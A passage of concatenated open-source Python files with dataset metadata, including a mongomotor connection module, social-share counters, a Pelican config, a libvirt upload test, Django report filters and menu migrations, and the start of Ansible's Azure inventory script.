timed_func():' + ('\n' + '\n'.join([' '+x for x in stmt.split('\n')])) exec code in global_dict, ns start = clock() ns['timed_func']() T = clock() - start if T >= Tmax/4.0: return T elif T >= Tmax/4.0/repeat_count: return pytime(ns['timed_func'], (), {}, Tmax-T) else: code = 'def timed_func():' + ('\n' + '\n'.join([' '+x for x in stmt.split('\n')]))*repeat_count exec code in global_dict, ns return pytime(ns['timed_func'], (), {}, Tmax-T) / repeat_count
mit
-7,438,097,726,899,165,000
25.294872
70
0.601658
false
3.401327
false
false
false
jucacrispim/mongomotor
mongomotor/connection.py
1
3842
# -*- coding: utf-8 -*- # Copyright 2016 Juca Crispim <juca@poraodojuca.net> # This file is part of mongomotor. # mongomotor is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # mongomotor is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # You should have received a copy of the GNU General Public License # along with mongomotor. If not, see <http://www.gnu.org/licenses/>. from mongoengine import connection from mongoengine.connection import (connect as me_connect, DEFAULT_CONNECTION_NAME, disconnect as me_disconnect, register_connection, get_connection) from mongomotor import utils from mongomotor.clients import (MongoMotorAsyncIOClient, MongoMotorTornadoClient) from mongomotor.monkey import MonkeyPatcher CLIENTS = {'asyncio': (MongoMotorAsyncIOClient,), 'tornado': (MongoMotorTornadoClient,)} _db_version = {} def get_mongodb_version(alias=DEFAULT_CONNECTION_NAME): """Return the version of the connected mongoDB (first 2 digits) :param alias: The alias identifying the connection :return: tuple(int, int) """ # e.g: (3, 2) version_list = get_connection(alias).server_info()["versionArray"][:2] return tuple(version_list) def get_db_version(alias=DEFAULT_CONNECTION_NAME): """Returns the version of the database for a given alias. This will patch the original mongoengine's get_mongodb_version. :param alias: The alias identifying the connection. """ return _db_version[alias] def connect(db=None, async_framework='asyncio', alias=DEFAULT_CONNECTION_NAME, **kwargs): """Connect to the database specified by the 'db' argument. Connection settings may be provided here as well if the database is not running on the default port on localhost. If authentication is needed, provide username and password arguments as well. Multiple databases are supported by using aliases. Provide a separate `alias` to connect to a different instance of :program:`mongod`. Parameters are the same as for :func:`mongoengine.connection.connect` plus one: :param async_framework: Which asynchronous framework should be used. It can be `tornado` or `asyncio`. Defaults to `asyncio`. """ clients = CLIENTS[async_framework] with MonkeyPatcher() as patcher: patcher.patch_db_clients(*clients) patcher.patch_sync_connections() ret = me_connect(db=db, alias=alias, **kwargs) # here we register a connection that will use the original pymongo # client and if used will block the process. # We need to patch here otherwise we will get the async connection # beeing reused instead of a sync one. with MonkeyPatcher() as patcher: patcher.patch_item(connection, '_find_existing_connection', lambda *a, **kw: None) kwargs.pop('io_loop', None) sync_alias = utils.get_sync_alias(alias) register_connection(sync_alias, db, **kwargs) _db_version[alias] = get_mongodb_version(sync_alias) return ret def disconnect(alias=DEFAULT_CONNECTION_NAME): """Disconnects from the database indentified by ``alias``. """ me_disconnect(alias=alias) # disconneting sync connection sync_alias = utils.get_sync_alias(alias) me_disconnect(alias=sync_alias)
gpl-3.0
4,309,757,562,831,834,600
34.906542
75
0.682457
false
4.176087
false
false
false
thinkxl/mentions
mentions/mentions.py
1
3175
# -*- coding: utf-8 -*- """ This module contains the primary objects that power Mention. """ import json import requests from bs4 import BeautifulSoup headers = {'User-Agent': 'Karma v0.1.0', 'From': '@thinkxl'} # Facebook def get_facebook_data(method, url): try: facebook_url = 'https://api.facebook.com/method/fql.query?query=select \ ' + method + ' from link_stat where url="' + url + '"&format=json' r = requests.get(facebook_url, headers=headers) json_data = json.loads(r.text) return json_data[0][method] except: return 0 def facebook_total_count(url): return get_facebook_data('total_count', url) def facebook_like_count(url): return get_facebook_data('like_count', url) def facebook_comment_count(url): return get_facebook_data('comment_count', url) def facebook_share_count(url): return get_facebook_data('share_count', url) # Twitter def tweets(url): """tweets count""" try: twitter_url = 'http://urls.api.twitter.com/1/urls/count.json?url=' + url r = requests.get(twitter_url, headers=headers) json_data = json.loads(r.text) return json_data['count'] except: return 0 # Google+ def google_plus_one(url): """+1's count""" try: google_url = 'https://plusone.google.com/_/+1/fastbutton?url=' + url soup = BeautifulSoup(requests.get(google_url, headers=headers).text) tag = soup.find_all(id="aggregateCount")[0] count = tag.string.extract() return count except: return 0 def linkedin_mentions(url): """mentions count""" try: linkedin_url = 'http://www.linkedin.com/countserv/count/share?url=' \ + url + '&format=json' json_data = json.loads(requests.get(linkedin_url, headers=headers).text) return json_data['count'] except: return 0 def pinterest_shares(url): """pinterest share count""" try: pinterest_url = 'http://api.pinterest.com/v1/urls/count.json?url=' \ + url response = requests.get(pinterest_url).text\ .replace('receiveCount(', '')\ .replace(')', '') json_data = json.loads(response) return json_data['count'] except: return 0 def stumbleupon_views(url): """views count""" try: stumbleupon_url = 'http://www.stumbleupon.com/services/1.01/badge.getinfo?\ url=' + url + '&format=jsonp' json_data = json.loads(requests.get(stumbleupon_url).text) return json_data['result']['views'] except: return 0 # def delicious_count(url): # """bookmarked count""" # delicious_url = 'http://feeds.delicious.com/v2/json/urlinfo/data?url='\ # + url # return requests.get(delicious_url).response def reddit_mentions(url): """mentions count""" try: reddit_url = 'http://www.reddit.com/api/info.json?url=' + url json_data = json.loads(requests.get(reddit_url, headers=headers).text) return len(json_data['data']['children']) except: return 0
mit
7,374,464,425,110,252,000
29.238095
83
0.596535
false
3.410311
false
false
false
kpolimis/kpolimis.github.io-src
pelicanconf.py
1
3979
#!/usr/bin/env python # -*- coding: utf-8 -*- # from __future__ import unicode_literals import os #from utils import filters AUTHOR = u'Kivan Polimis' SITENAME = u'Kivan Polimis' # SITESUBTITLE = u'my personal musings and attempts to apply \ # and share some programming tips' INDEX_SAVE_AS = 'pages/home.html' PATH = 'content' PAGE_ORDER_BY = 'sortorder' # Times and dates TIMEZONE = 'US/Pacific' DEFAULT_LANG = u'en' SUMMARY_MAX_LENGTH = '50' GOOGLE_ANALYTICS = 'UA-104881568-1' # Set the article URL #ARTICLE_URL = 'blog/{date:%Y}/{date:%m}/{date:%d}/{slug}/' #ARTICLE_SAVE_AS = 'blog/{date:%Y}/{date:%m}/{date:%d}/{slug}/index.html' # Theme and plugins # JINJA_FILTERS = {'sidebar': filters.sidebar} THEME = "pelican-themes/nest" # Minified CSS NEST_CSS_MINIFY = True # Add canonical link element to top page header and all article/author/category/tag page header NEST_REL_CANONICAL_LINK = True NEST_HEADER_IMAGES = '' NEST_HEADER_LOGO = '/images/jade_mountain.png' DISPLAY_PAGES_ON_MENU = False # MENUITEMS = [('Home', '/index.html'), ('Articles', '/categories.html')] MENUITEMS = [('Home', '/index.html'),('Articles','/categories.html'), ('Vita','/pages/vita.html'), ('Software','/pages/software.html'), ('Projects','/pages/projects.html')] # categories.html NEST_CATEGORIES_HEAD_TITLE = u'Articles' NEST_CATEGORIES_HEAD_DESCRIPTION = u'Articles listed by category' NEST_CATEGORIES_HEADER_TITLE = u'Articles' NEST_CATEGORIES_HEADER_SUBTITLE = u'Articles listed by category' # software.html NEST_SOFTWARE_HEAD_TITLE = u'Software' NEST_SOFTWARE_HEAD_DESCRIPTION = u'Software' NEST_SOFTWARE_HEADER_TITLE = u'Software' NEST_SOFTWARE_HEADER_SUBTITLE = u'Articles listed by category' # Footer NEST_SITEMAP_COLUMN_TITLE = u'Sitemap' NEST_SITEMAP_MENU = [('Home', '/index.html'),('Articles','/categories.html'), ('Vita','/pages/vita.html'), ('Software','/pages/software.html'), ('Projects','/pages/projects.html')] NEST_SITEMAP_ATOM_LINK = u'Atom Feed' NEST_SITEMAP_RSS_LINK = u'RSS Feed' NEST_SOCIAL_COLUMN_TITLE = u'Social' NEST_LINKS_COLUMN_TITLE = u'Links' NEST_COPYRIGHT = u'&copy; Kivan Polimis 2021' # pagination.html NEST_PAGINATION_PREVIOUS = u'Previous' NEST_PAGINATION_NEXT = u'Next' # Footer optional NEST_FOOTER_HTML = '' # Static files STATIC_PATHS = ['images', 'favicon.ico'] CODE_DIR = 'downloads/code' NOTEBOOK_DIR = 'downloads/notebooks' READERS = {'html': None} PLUGIN_PATHS = ['pelican-plugins'] PLUGINS = ['liquid_tags.notebook', # for embedding notebooks 'summary', # auto-summarizing articles 'feed_summary', # use summaries for RSS, not full articles 'render_math' ] MD = ['codehilite(css_class=highlight)','extra', 'mathjax'] # Only use LaTeX for selected articles LATEX = 'article' # SUMMARY_USE_FIRST_PARAGRAPH = 'True' TWITTER_USERNAME = 'kpolimis' GITHUB_USERNAME = 'kpolimis' AUTHOR_CV = "http://kivanpolimis.com/docs/Kivan_Polimis_Curriculum_Vitae.pdf" SHOW_ARCHIVES = True IGNORE_FILES = ['.ipynb_checkpoints'] if not os.path.exists('_nb_header.html'): import warnings warnings.warn("_nb_header.html not found. " "Rerun make html to finalize build.") else: EXTRA_HEADER = open('_nb_header.html').read() # RMD_READER_KNITR_OPTS_CHUNK = {'fig.path': '../../../figure/'} # Feed generation is usually not desired when developing FEED_ALL_ATOM = None CATEGORY_FEED_ATOM = None TRANSLATION_FEED_ATOM = None AUTHOR_FEED_ATOM = None AUTHOR_FEED_RSS = None # Title menu options DEFAULT_PAGINATION = 10 # Uncomment following line if you want document-relative URLs when developing RELATIVE_URLS = True # Blogroll #LINKS = (('Pelican', 'http://getpelican.com/'), # ('Python.org', 'http://python.org/'), # ('Jinja2', 'http://jinja.pocoo.org/'), # ('You can modify those links in your config file', '#'),) # Social widget #SOCIAL = (('You can add links in your config file', '#'), # ('Another social link', '#'),)
gpl-3.0
2,233,683,985,221,732,400
28.474074
95
0.688615
false
2.923586
false
false
false
libvirt/libvirt-test-API
libvirttestapi/repos/storage/dir_vol_upload.py
1
5210
# Copyright (C) 2010-2012 Red Hat, Inc. # This work is licensed under the GNU GPLv2 or later. # dir storage volume upload testing, only raw format volume is # supported, other format might fail. offset and length can # only be chosen in 0 and 1048576. import os import string import sys from xml.dom import minidom from libvirt import libvirtError from libvirttestapi.src import sharedmod from libvirttestapi.utils import utils required_params = ('poolname', 'volname', 'volformat', 'capacity', 'offset', 'length',) optional_params = {'xml': 'xmls/dir_volume.xml', } def get_pool_path(poolobj): """ get pool xml description """ poolxml = poolobj.XMLDesc(0) logger.debug("the xml description of pool is %s" % poolxml) doc = minidom.parseString(poolxml) path_element = doc.getElementsByTagName('path')[0] textnode = path_element.childNodes[0] path_value = textnode.data return path_value def write_file(path): """write 1M test data to file """ logger.info("write data into file %s" % path) f = open(path, 'w') if sys.version_info[0] < 3: datastr = ''.join(string.lowercase + string.uppercase + string.digits + '.' + '\n') else: datastr = ''.join(string.ascii_lowercase + string.ascii_uppercase + string.digits + '.' + '\n') data = ''.join(16384 * datastr) f.write(data) f.close() def handler(stream, data, file_): return file_.read(data) def dir_vol_upload(params): """test volume download and check""" global logger logger = params['logger'] poolname = params['poolname'] volname = params['volname'] volformat = params['volformat'] offset = int(params['offset']) length = int(params['length']) capacity = params['capacity'] xmlstr = params['xml'] logger.info("the poolname is %s, volname is %s, volformat is %s" % (poolname, volname, volformat)) logger.info("upload offset is: %s" % offset) logger.info("the data length to upload is: %s" % length) conn = sharedmod.libvirtobj['conn'] try: poolobj = conn.storagePoolLookupByName(poolname) path_value = get_pool_path(poolobj) volume_path = path_value + "/" + volname xmlstr = xmlstr.replace('VOLPATH', volume_path) xmlstr = xmlstr.replace('SUFFIX', capacity[-1]) xmlstr = xmlstr.replace('CAP', capacity[:-1]) logger.debug("volume xml:\n%s" % xmlstr) logger.info("create %s %s volume" % (volname, volformat)) vol = poolobj.createXML(xmlstr, 0) test_path = path_value + "/" + "vol_test" write_file(test_path) olddigest = utils.digest(test_path, 0, 0) logger.debug("the old file digest is: %s" % olddigest) if offset: origdigestpre = utils.digest(volume_path, 0, offset) else: origdigestpre = '' logger.debug("the original pre region digest is: %s" % origdigestpre) origdigestpost = utils.digest(volume_path, offset + 1024 * 1024, 0) logger.debug("the original post region digest is: %s" % origdigestpost) st = conn.newStream(0) if sys.version_info[0] < 3: f = open(test_path, 'r') else: f = open(test_path, 'rb') logger.info("start upload") vol.upload(st, offset, length, 0) logger.info("sent all data") st.sendAll(handler, f) logger.info("finished stream") st.finish() f.close() newdigest = utils.digest(volume_path, offset, 1024 * 1024) logger.debug("the new file digest is: %s" % olddigest) if offset: newdigestpre = utils.digest(volume_path, 0, offset) else: newdigestpre = '' logger.debug("the new pre region digest is: %s" % origdigestpre) newdigestpost = utils.digest(volume_path, offset + 1024 * 1024, 0) logger.debug("the new post region digest is: %s" % origdigestpost) if newdigestpre == origdigestpre: logger.info("file pre region digests match") else: logger.error("file pre region digests not match") return 1 if olddigest == newdigest: logger.info("file digests match") else: logger.error("file digests not match") return 1 if newdigestpost == origdigestpost: logger.info("file post region digests match") else: logger.error("file post region digests not match") return 1 except libvirtError as e: logger.error("libvirt call failed: " + str(e)) return 1 return 0 def dir_vol_upload_clean(params): """clean testing environment""" poolname = params['poolname'] volname = params['volname'] conn = sharedmod.libvirtobj['conn'] poolobj = conn.storagePoolLookupByName(poolname) path_value = get_pool_path(poolobj) test_path = path_value + "/" + "vol_test" vol = poolobj.storageVolLookupByName(volname) vol.delete(0) if os.path.exists(test_path): os.unlink(test_path) return 0
gpl-2.0
4,381,108,374,907,106,000
29.647059
79
0.605758
false
3.681979
true
false
false
olingrobin/test
day1/user.py
1
1087
error_name = open("namefile.txt","a") error_name.close() list = {"jin":"123","tom":"456","jak":"789","aimi":"012"} count = 0 status = False while True: user_name = input("请输入用户名:") error_name = open("namefile.txt","r") for name in error_name: if user_name == name.strip(): status = True break if status == True: error_name.close() print("用户已被禁止登陆") break user_password = input("请输入密码:") for k,v in list.items(): if user_name in k and user_password in v: print("欢迎用户:",k) status = True break else: continue if status == True: break count += 1 if count < 3: print("请检查用户名或密码:") continue if count >= 3: print("输入错误三次,用户",user_name,"已进入黑名单") error_user = open("namefile.txt","a") error_user.write(user_name) error_user.write("\n") error_user.close() break
gpl-3.0
-9,159,499,533,204,680,000
22.642857
57
0.512588
false
3.152381
false
false
false
DeveloperJose/Vision-Rat-Brain
feature_matching_v3/util_sift.py
1
1540
# Author: Jose G Perez # Version 1.0 # Last Modified: January 31, 2018 import numpy as np import cv2 import os SIFT = cv2.xfeatures2d.SIFT_create(contrastThreshold=0.05, edgeThreshold=100, sigma=2) def kp_to_array(kp): array = np.zeros((len(kp), 7), dtype=np.float32) for idx in range(array.shape[0]): k = kp[idx] array[idx] = np.array([k.pt[0], k.pt[1], k.size,k.angle,k.response,k.octave,k.class_id]) return array def array_to_kp(array): kp = [] for idx in range(array.shape[0]): k = array[idx] kp.append(cv2.KeyPoint(k[0],k[1],k[2],k[3],k[4],k[5],k[6])) return kp def __precompute_atlas(name): if not os.path.isfile(name + '_SIFT.npz'): print('Precomputing SIFT for ', name) atlas_data = np.load(name + ".npz") atlas_im = atlas_data['images'] atlas_labels = atlas_data['labels'] atlas_kp = [] atlas_des = [] for i in range(0, atlas_im.shape[0]): kp, des = SIFT.detectAndCompute(atlas_im[i], None) kp = kp_to_array(kp) atlas_kp.append(kp) atlas_des.append(des) atlas_kp = np.asarray(atlas_kp) atlas_des = np.asarray(atlas_des) np.savez_compressed(name + '_SIFT', images=atlas_im, labels=atlas_labels, kp=atlas_kp, des=atlas_des) def precompute_sift(S_NAME, PW_NAME): __precompute_atlas(S_NAME) __precompute_atlas(PW_NAME) def load_sift(path): data = np.load(path) return data['images'], data['labels'], data['kp'], data['des']
mit
-6,412,502,763,211,562,000
30.44898
109
0.597403
false
2.745098
false
false
false
wd8rde/genesis_g59_py
setup.py
1
1416
#!/usr/bin/env python #The MIT License (MIT) # #Copyright (c) 2015 Robert Anthony Bouterse, WD8RDE # #Permission is hereby granted, free of charge, to any person obtaining a copy #of this software and associated documentation files (the "Software"), to deal #in the Software without restriction, including without limitation the rights #to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #copies of the Software, and to permit persons to whom the Software is #furnished to do so, subject to the following conditions: # #The above copyright notice and this permission notice shall be included in all #copies or substantial portions of the Software. # #THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE #SOFTWARE. from distutils.core import setup setup(name='genesis_g59', version='0.1', description='Genesis G59 USB Control Utilities', author='WD8RDE', author_email='wd8rde@gmail.com', url='', packages=['genesis_g59','genesis_g59.g59_si570'], )
mit
-5,464,127,228,988,461,000
43.25
79
0.75565
false
3.933333
false
false
false
Dangetsu/vnr
Frameworks/Sakura/py/libs/vnragent/engine.py
1
2147
# coding: utf8 # engine.py # 5/3/2014 jichi # The logic in this file must be consistent with that in vnragent.dll. if __name__ == '__main__': # DEBUG import sys sys.path.append("..") import os from glob import glob from sakurakit.skdebug import dprint from sakurakit.skfileio import escapeglob class Engine: def __init__(self, name='', regionLocked=False, vnrboot=False, **kwargs): self.name = name # str self.regionLocked = regionLocked # bool self.vnrboot = vnrboot # bool # Not used #def encoding(self): return 'utf-16' if self.wideChar else 'shift-jis' class EngineFinder: def __init__(self, pid=0, exepath='', dirpath=''): """ @param* pid long process id @param* exepath unicode executable path @param* dirpath unicode process directory path """ if not exepath and pid: exepath = skwin.get_process_path(pid) if not dirpath and exepath: dirpath = os.path.dirname(exepath) self.pid = pid # long self.exepath = exepath # unicode self.dirpath = dirpath # unicode #self.processName = skwin.get_process_name(pid) def eval(self, e): """ @param e list or str @return bool """ if not e: return False if isinstance(e, list): for it in e: if not self.eval(it): return False return True # e is str or unicode elif '|' in e: for it in e.split('|'): if self.eval(it): return True return False elif e[0] == '!' and len(e) > 1: return not self.eval(e[1:]) elif '*' in e: return self.globs(e) else: return self.exists(e) def globs(self, relpath): """ @param relpath unicode @return bool """ return bool(self.dirpath and glob(os.path.join(escapeglob(self.dirpath), relpath))) def exists(self, relpath): """ @param relpath unicode @return bool """ return bool(self.dirpath) and os.path.exists(os.path.join(self.dirpath, relpath)) def getAbsPath(self, relpath): """ @param relpath unicode @return unicode """ return os.path.join(self.dirpath, relpath) # EOF
gpl-3.0
-3,036,005,952,833,670,000
23.965116
87
0.615277
false
3.413355
false
false
false
gmimano/commcaretest
corehq/apps/reports/filters/select.py
1
5848
import datetime import calendar from django.conf import settings from django.utils.translation import ugettext_noop from django.utils.translation import ugettext as _ from casexml.apps.case.models import CommCareCase, CommCareCaseGroup from corehq.apps.app_manager.models import Application from corehq.apps.domain.models import Domain, LICENSES from corehq.apps.groups.models import Group from corehq.apps.orgs.models import Organization from corehq.apps.reports.filters.base import BaseSingleOptionFilter, BaseMultipleOptionFilter class SelectRegionFilter(BaseSingleOptionFilter): slug = "region" label = ugettext_noop("Region") default_text = ugettext_noop("All Regions") @property def options(self): if hasattr(Domain, 'regions'): available_regions = [(d.replace(' ', '+'), d) for d in Domain.regions()] else: available_regions = [] return available_regions class SelectLicenseFilter(BaseSingleOptionFilter): slug = "license" label = ugettext_noop("License") default_text = ugettext_noop("All Licenses") @property def options(self): return [(code, license_name) for code, license_name in LICENSES.items()] class SelectCategoryFilter(BaseSingleOptionFilter): slug = "category" label = ugettext_noop("Category") default_text = ugettext_noop("All Categories") @property def options(self): if hasattr(Domain, 'categories'): available_categories = [(d.replace(' ', '+'), d) for d in Domain.categories()] else: available_categories = [] return available_categories class SelectOrganizationFilter(BaseSingleOptionFilter): slug = "org" label = ugettext_noop("Organization") default_text = ugettext_noop("All Organizations") @property def options(self): return [(o.name, o.title) for o in Organization.get_all()] class GroupFilterMixin(object): slug = "group" label = ugettext_noop("Group") default_text = ugettext_noop("Everybody") @property def options(self): return [(group.get_id, group.name) for group in Group.get_reporting_groups(self.domain)] class GroupFilter(GroupFilterMixin, BaseSingleOptionFilter): placeholder = ugettext_noop('Click to select a group') class MultiGroupFilter(GroupFilterMixin, BaseMultipleOptionFilter): placeholder = ugettext_noop('Click to select groups') class YearFilter(BaseSingleOptionFilter): slug = "year" label = ugettext_noop("Year") default_text = None @property def options(self): start_year = getattr(settings, 'START_YEAR', 2008) years = [(unicode(y), y) for y in range(start_year, datetime.datetime.utcnow().year + 1)] years.reverse() return years class MonthFilter(BaseSingleOptionFilter): slug = "month" label = ugettext_noop("Month") default_text = None @property def options(self): return [("%02d" % m, calendar.month_name[m]) for m in range(1, 13)] class CaseTypeFilter(BaseSingleOptionFilter): slug = "case_type" label = ugettext_noop("Case Type") default_text = ugettext_noop("All Case Types") @property def options(self): case_types = self.get_case_types(self.domain) return [(case, "%s" % case) for case in case_types] @classmethod def get_case_types(cls, domain): key = [domain] for r in CommCareCase.get_db().view( 'hqcase/all_cases', startkey=key, endkey=key + [{}], group_level=2 ).all(): _, case_type = r['key'] if case_type: yield case_type @classmethod def get_case_counts(cls, domain, case_type=None, user_ids=None): """ Returns open count, all count """ user_ids = user_ids or [{}] for view_name in ('hqcase/open_cases', 'hqcase/all_cases'): def individual_counts(): for user_id in user_ids: key = [domain, case_type or {}, user_id] try: yield CommCareCase.get_db().view( view_name, startkey=key, endkey=key + [{}], group_level=0 ).one()['value'] except TypeError: yield 0 yield sum(individual_counts()) class SelectOpenCloseFilter(BaseSingleOptionFilter): slug = "is_open" label = ugettext_noop("Opened / Closed") default_text = ugettext_noop("Show All") @property def options(self): return [ ('open', _("Only Open")), ('closed', _("Only Closed")), ] class SelectApplicationFilter(BaseSingleOptionFilter): slug = "app" label = ugettext_noop("Application") default_text = ugettext_noop("Select Application [Latest Build Version]") @property def options(self): apps_for_domain = Application.get_db().view( "app_manager/applications_brief", startkey=[self.domain], endkey=[self.domain, {}], include_docs=True ).all() return [(app['value']['_id'], _("%(name)s [up to build %(version)s]") % { 'name': app['value']['name'], 'version': app['value']['version']}) for app in apps_for_domain] class MultiCaseGroupFilter(BaseMultipleOptionFilter): slug = "case_group" label = ugettext_noop("Case Group") default_text = ugettext_noop("All Case Groups") placeholder = ugettext_noop('Click to select case groups') @property def options(self): return [(g["id"], g["key"][1]) for g in CommCareCaseGroup.get_all(self.domain, include_docs=False)]
bsd-3-clause
2,471,994,198,075,688,000
31.131868
107
0.612859
false
4.075261
false
false
false
django-erp/django-erp
djangoerp/menus/migrations/0002_initial_fixture.py
1
3421
from django.db import models, migrations from django.utils.translation import ugettext_noop as _ from django.urls import reverse from ..utils import create_detail_actions, create_detail_navigation def install(apps, schema_editor): # Models. User = apps.get_model('core.User') Group = apps.get_model('core.Group') Permission = apps.get_model('core.Permission') Menu = apps.get_model('menus.Menu') Link = apps.get_model('menus.Link') # Instances. users_group, is_new = Group.objects.get_or_create(name="users") add_bookmark, is_new = Permission.objects.get_or_create_by_natural_key("add_link", "menus", "Link") edit_user, is_new = Permission.objects.get_or_create_by_natural_key("change_user", "core", "User") delete_user, is_new = Permission.objects.get_or_create_by_natural_key("delete_user", "core", "User") # Menus. main_menu, is_new = Menu.objects.get_or_create( slug="main", description=_("Main menu") ) user_area_not_logged_menu, is_new = Menu.objects.get_or_create( slug="user_area_not_logged", description=_("User area for anonymous users") ) user_area_logged_menu, is_new = Menu.objects.get_or_create( slug="user_area_logged", description=_("User area for logged users") ) user_detail_actions, is_new = create_detail_actions(User) user_detail_navigation, is_new = create_detail_navigation(User) # Links. my_dashboard_link, is_new = Link.objects.get_or_create( menu_id=main_menu.pk, title=_("My Dashboard"), slug="my-dashboard", description=_("Go back to your dashboard"), url="/" ) login_link, is_new = Link.objects.get_or_create( title=_("Login"), slug="login", description=_("Login"), url=reverse("user_login"), only_authenticated=False, menu_id=user_area_not_logged_menu.pk ) administration_link, is_new = Link.objects.get_or_create( title=_("Administration"), slug="administration", description=_("Administration panel"), url="/admin/", only_staff=True, menu_id=user_area_logged_menu.pk ) logout_link, is_new = Link.objects.get_or_create( title=_("Logout"), slug="logout", description=_("Logout"), url=reverse("user_logout"), menu_id=user_area_logged_menu.pk ) user_edit_link, is_new = Link.objects.get_or_create( title=_("Edit"), slug="user-edit", description=_("Edit"), url="user_edit", context='{"pk": "object.pk"}', menu_id=user_detail_actions.pk ) user_edit_link.only_with_perms.set([edit_user]) user_delete_link, is_new = Link.objects.get_or_create( title=_("Delete"), slug="user-delete", description=_("Delete"), url="user_delete", context='{"pk": "object.pk"}', menu_id=user_detail_actions.pk ) user_delete_link.only_with_perms.set([delete_user]) # Permissions. users_group.permissions.add(add_bookmark) class Migration(migrations.Migration): dependencies = [ ('menus', '0001_initial'), ('contenttypes', '0002_remove_content_type_name'), ('core', '0002_initial_fixture'), ] operations = [ migrations.RunPython(install), ]
mit
-8,335,009,606,325,166,000
30.1
104
0.602455
false
3.604847
false
false
false
DazWorrall/ansible
contrib/inventory/azure_rm.py
1
32749
#!/usr/bin/env python # # Copyright (c) 2016 Matt Davis, <mdavis@ansible.com> # Chris Houseknecht, <house@redhat.com> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # ''' Azure External Inventory Script =============================== Generates dynamic inventory by making API requests to the Azure Resource Manager using the Azure Python SDK. For instruction on installing the Azure Python SDK see http://azure-sdk-for-python.readthedocs.org/ Authentication -------------- The order of precedence is command line arguments, environment variables, and finally the [default] profile found in ~/.azure/credentials. If using a credentials file, it should be an ini formatted file with one or more sections, which we refer to as profiles. The script looks for a [default] section, if a profile is not specified either on the command line or with an environment variable. The keys in a profile will match the list of command line arguments below. For command line arguments and environment variables specify a profile found in your ~/.azure/credentials file, or a service principal or Active Directory user. Command line arguments: - profile - client_id - secret - subscription_id - tenant - ad_user - password Environment variables: - AZURE_PROFILE - AZURE_CLIENT_ID - AZURE_SECRET - AZURE_SUBSCRIPTION_ID - AZURE_TENANT - AZURE_AD_USER - AZURE_PASSWORD Run for Specific Host ----------------------- When run for a specific host using the --host option, a resource group is required. For a specific host, this script returns the following variables: { "ansible_host": "XXX.XXX.XXX.XXX", "computer_name": "computer_name2", "fqdn": null, "id": "/subscriptions/subscription-id/resourceGroups/galaxy-production/providers/Microsoft.Compute/virtualMachines/object-name", "image": { "offer": "CentOS", "publisher": "OpenLogic", "sku": "7.1", "version": "latest" }, "location": "westus", "mac_address": "00-00-5E-00-53-FE", "name": "object-name", "network_interface": "interface-name", "network_interface_id": "/subscriptions/subscription-id/resourceGroups/galaxy-production/providers/Microsoft.Network/networkInterfaces/object-name1", "network_security_group": null, "network_security_group_id": null, "os_disk": { "name": "object-name", "operating_system_type": "Linux" }, "plan": null, "powerstate": "running", "private_ip": "172.26.3.6", "private_ip_alloc_method": "Static", "provisioning_state": "Succeeded", "public_ip": "XXX.XXX.XXX.XXX", "public_ip_alloc_method": "Static", "public_ip_id": "/subscriptions/subscription-id/resourceGroups/galaxy-production/providers/Microsoft.Network/publicIPAddresses/object-name", "public_ip_name": "object-name", "resource_group": "galaxy-production", "security_group": "object-name", "security_group_id": "/subscriptions/subscription-id/resourceGroups/galaxy-production/providers/Microsoft.Network/networkSecurityGroups/object-name", "tags": { "db": "database" }, "type": "Microsoft.Compute/virtualMachines", "virtual_machine_size": "Standard_DS4" } Groups ------ When run in --list mode, instances are grouped by the following categories: - azure - location - resource_group - security_group - tag key - tag key_value Control groups using azure_rm.ini or set environment variables: AZURE_GROUP_BY_RESOURCE_GROUP=yes AZURE_GROUP_BY_LOCATION=yes AZURE_GROUP_BY_SECURITY_GROUP=yes AZURE_GROUP_BY_TAG=yes Select hosts within specific resource groups by assigning a comma separated list to: AZURE_RESOURCE_GROUPS=resource_group_a,resource_group_b Select hosts for specific tag key by assigning a comma separated list of tag keys to: AZURE_TAGS=key1,key2,key3 Select hosts for specific locations: AZURE_LOCATIONS=eastus,westus,eastus2 Or, select hosts for specific tag key:value pairs by assigning a comma separated list key:value pairs to: AZURE_TAGS=key1:value1,key2:value2 If you don't need the powerstate, you can improve performance by turning off powerstate fetching: AZURE_INCLUDE_POWERSTATE=no azure_rm.ini ------------ As mentioned above, you can control execution using environment variables or a .ini file. A sample azure_rm.ini is included. The name of the .ini file is the basename of the inventory script (in this case 'azure_rm') with a .ini extension. It also assumes the .ini file is alongside the script. To specify a different path for the .ini file, define the AZURE_INI_PATH environment variable: export AZURE_INI_PATH=/path/to/custom.ini Powerstate: ----------- The powerstate attribute indicates whether or not a host is running. If the value is 'running', the machine is up. If the value is anything other than 'running', the machine is down, and will be unreachable. Examples: --------- Execute /bin/uname on all instances in the galaxy-qa resource group $ ansible -i azure_rm.py galaxy-qa -m shell -a "/bin/uname -a" Use the inventory script to print instance specific information $ contrib/inventory/azure_rm.py --host my_instance_host_name --pretty Use with a playbook $ ansible-playbook -i contrib/inventory/azure_rm.py my_playbook.yml --limit galaxy-qa Insecure Platform Warning ------------------------- If you receive InsecurePlatformWarning from urllib3, install the requests security packages: pip install requests[security] author: - Chris Houseknecht (@chouseknecht) - Matt Davis (@nitzmahone) Company: Ansible by Red Hat Version: 1.0.0 ''' import argparse import ConfigParser import json import os import re import sys from packaging.version import Version from os.path import expanduser HAS_AZURE = True 